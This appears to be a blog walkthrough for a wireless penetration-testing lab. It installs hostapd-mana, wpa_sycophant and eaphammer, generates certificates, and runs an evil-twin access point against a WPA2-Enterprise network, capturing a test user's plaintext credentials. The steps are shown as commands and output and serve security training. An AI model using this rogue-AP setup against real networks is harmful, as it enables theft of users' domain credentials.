Wireless pentest lab Part 1

Part 2

Part 3

Reference and credit: https://w1f1.net/


Tools:

screen

Linux screen is a command-line utility that allows you to manage multiple terminal sessions within a single window. It is particularly useful when you need to keep long-running processes or sessions active, even if you disconnect from the server or close the terminal window.

└─$ sudo apt-get install screen

[sudo] password for lab:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Suggested packages:
  byobu | screenie | iselect
The following packages will be upgraded:
  screen

hostapd-mana

└─$ sudo apt-get install hostapd-mana

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
  hostapd-mana
0 upgraded, 1 newly installed, 0 to remove and 1756 not upgraded.
Need to get 475 kB of archives.
After this operation, 1,335 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali kali-rolling/main amd64 hostapd-mana amd64 2.6.5+git20200121-0kali5 [475 kB]
Fetched 475 kB in 1s (428 kB/s)
Selecting previously unselected package hostapd-mana.
(Reading database ... 335599 files and directories currently installed.)
Preparing to unpack .../hostapd-mana_2.6.5+git20200121-0kali5_amd64.deb ...
Unpacking hostapd-mana (2.6.5+git20200121-0kali5) ...
Setting up hostapd-mana (2.6.5+git20200121-0kali5) ...
Warning: No -copy_extensions given; ignoring any extensions in the request
Generating DH parameters, 2048 bit long safe prime
...................................+...................................................

OR

apt-get --yes install build-essential pkg-config git libnl-genl-3-dev libssl-dev 
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
make -C hostapd

wpa_sycophant

└─$ sudo apt install wpa-sycophant

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
  wpa-sycophant
0 upgraded, 1 newly installed, 0 to remove and 1756 not upgraded.
Need to get 324 kB of archives.
After this operation, 887 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali kali-rolling/main amd64 wpa-sycophant amd64 1.0+git20210103-0kali3 [324 kB]
Fetched 324 kB in 11s (30.2 kB/s)
Selecting previously unselected package wpa-sycophant.
(Reading database ... 335611 files and directories currently installed.)
Preparing to unpack .../wpa-sycophant_1.0+git20210103-0kali3_amd64.deb ...
Unpacking wpa-sycophant (1.0+git20210103-0kali3) ...
Setting up wpa-sycophant (1.0+git20210103-0kali3) ...
Processing triggers for kali-menu (2022.3.1) ...

eap-hammer

└─$ sudo apt-cache search eaphammer

eaphammer - toolkit for targeted evil twin attacks against WPA2-Enterprise networks
eaphammer-dbgsym - debug symbols for eaphammer

└─$ sudo apt-get install eaphammer
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libcfitsio9 libgdal31 libllvm11 libpoppler118 libpython3.10-dev libtbb12 libtbbmalloc2 llvm-11 llvm-11-linker-tools llvm-11-runtime python3.10-dev
Use 'sudo apt autoremove' to remove them.

OR


git clone https://github.com/s0lst1c3/eaphammer.git

cd eaphammer
./kali-setup

Error message while executing ./eaphammer

└─$ ./eaphammer --cert-wizard
/usr/bin/env: ‘python3.8’: No such file or directory
└─$ python3

Completing external command
python              python3             python3.10-config   python3-commonmark  python3-pasteurize  python-faraday
python2             python3.9           python3.11          python3-config      python3-qr
python2.7           python3.10          python3.11-config   python3-futurize    python-dotenv

Edit the eaphammer file and update 3.8 to the respective python version

nano eaphammer

Testing eaphammer

└─$ sudo ./eaphammer

                     .__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/


                        A nice shiny new access point.

                             Version:  1.13.5
                            Codename:  Power Overwhelming
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>solstice(doT)sh


usage: eaphammer [-h] [--cert-wizard [{create,import,interactive,list,dh}] |
                 --list-templates | --create-template | --delete-template |
                 --bootstrap | --creds | --pmkid | --eap-spray |
                 --hostile-portal | --captive-portal-server-only |
                 --captive-portal] [--debug] [--lhost LHOST] [-i INTERFACE]
                 [-e ESSID] [-b BSSID] [-c CHANNEL] [--hw-mode HW_MODE]
                 [--cloaking {none,full,zeroes}]
                 [--auth {open,wpa-psk,wpa-eap,owe,owe-transition,owe-psk}]
                 [--pmf {disable,enable,require}] [--karma]
                 [--mac-whitelist MAC_WHITELIST]
                 [--mac-blacklist MAC_BLACKLIST]
                 [--ssid-whitelist SSID_WHITELIST]
                 [--ssid-blacklist SSID_BLACKLIST] [--loud] [--known-beacons]
                 [--known-ssids-file KNOWN_SSIDS_FILE]
                 [--known-ssids KNOWN_SSIDS [KNOWN_SSIDS ...]]
                 [--channel-width MGhz] [--wpa-passphrase WPA_PASSPHRASE]
                 [--capture-wpa-handshakes {yes,no}]
                 [--psk-capture-file PSK_CAPTURE_FILE]
                 [--auth-alg {shared,open,both}] [--wpa-version {1,2}]
                 [--transition-bssid OWE_TRANSITION_BSSID]
                 [--transition-ssid OWE_TRANSITION_SSID] [--autocrack]
                 [--negotiate {balanced,speed,weakest,gtc-downgrade,manual}]
                 [--remote-cracking-rig server:port] [--wordlist WORDLIST]
                 [--name NAME] [--description DESCRIPTION] [--author AUTHOR]
                 [--add-download-form] [--dl-form-message DL_FORM_MESSAGE]
                 [--lport LPORT] [--payload PAYLOAD]
                 [--portal-template PORTAL_USER_TEMPLATE] [--pivot]
                 [-I iface_n [iface_n ...]] [--user-list USER_LIST]
                 [--password PASSWORD]

[!] Please specify a valid PHY interface using the --interface flag

[!] Use -h or --help to display a list of basic options.
[!] Use -hh or --advanced-help to display full list of extended options.

# generate certificates

└─$ sudo ./eaphammer --cert-wizard

[sudo] password for lab:

                     .__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/


                        A nice shiny new access point.

                             Version:  1.13.5
                            Codename:  Power Overwhelming
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>solstice(doT)sh


[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Please enter two letter country code for certs (i.e. US, FR)
: US
[*] Please enter state or province for certs (i.e. Ontario, New Jersey)
: New York
[*] Please enter locale for certs (i.e. London, Hong Kong)
: New York City
[*] Please enter organization for certs (i.e. Evil Corp)
: Secure Wireless
[*] Please enter org unit for certs (i.e. Hooman Resource Says)
: Network Security
[*] Please enter email for certs (i.e. cyberz@h4x0r.lulz)
: networksecurity@securewireless.com
[*] Please enter common name (CN) for certs.
: wirelesssecurity.securewireless.com
[CW] Creating CA cert and key pair...
[CW] Complete!
[CW] Writing CA cert and key pair to disk...
[CW] New CA cert and private key written to: /home/lab/wirelesspentestlabs/eaphammer/certs/ca/wirelesssecurity.securewireless.com.pem
[CW] Complete!
[CW] Creating server private key...
[CW] Complete!
[CW] Using server private key to create CSR...
[CW] Complete!
[CW] Creating server cert using CSR and signing it with CA key...
[CW] Complete!
[CW] Writing server cert and key pair to disk...
[CW] Complete!
[CW] Activating full certificate chain...
[CW] Complete!
# launch attack

./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid SecureWireless
└─$ sudo ./eaphammer -i wlan3 --channel 36  --auth wpa-eap --essid SecureWireless

                     .__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/


                        A nice shiny new access point.

                             Version:  1.13.5
                            Codename:  Power Overwhelming
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>solstice(doT)sh


[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...

[*] Using nmcli to tell NetworkManager not to manage wlan3...

100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00,  1.00s/it]

[*] Success: wlan3 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 36)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /home/lab/wirelesspentestlabs/eaphammer/loot/wpa_handshake_capture-2023-04-03-17-57-53-n1kX7WERTUXUybmGSw3AP2gctqHnj2p9.hccapx

[hostapd] AP starting...

Configuration file: /home/lab/wirelesspentestlabs/eaphammer/tmp/hostapd-2023-04-03-17-57-53-GwIlnhXNL80yuTZjA0uzjBT5Myd3hFAI.conf
wlan3: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan3 with hwaddr 00:11:22:33:44:00 and ssid "SecureWireless"
wlan3: interface state COUNTRY_UPDATE->ENABLED
wlan3: AP-ENABLED


Press enter to quit...

wlan3: STA de:91:11:ce:b5:77 IEEE 802.11: associated
wlan3: CTRL-EVENT-EAP-STARTED de:91:11:ce:b5:77
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan3: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25


GTC: Mon Apr  3 17:58:46 2023
         username:      user1
         password:      Iusedmydomaincreds
wlan3: CTRL-EVENT-EAP-FAILURE de:91:11:ce:b5:77
wlan3: STA de:91:11:ce:b5:77 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan3: STA de:91:11:ce:b5:77 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan3: STA de:91:11:ce:b5:77 IEEE 802.11: disassociated

[hostapd] Terminating event loop...
[hostapd] Event loop terminated.
[hostapd] Hostapd worker still running... waiting for it to join.

wlan3: interface state ENABLED->DISABLED
wlan3: AP-DISABLED
wlan3: CTRL-EVENT-TERMINATING
nl80211: deinit ifname=wlan3 disabled_11b_rates=0

[hostapd] Worker joined.
[hostapd] AP disabled.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.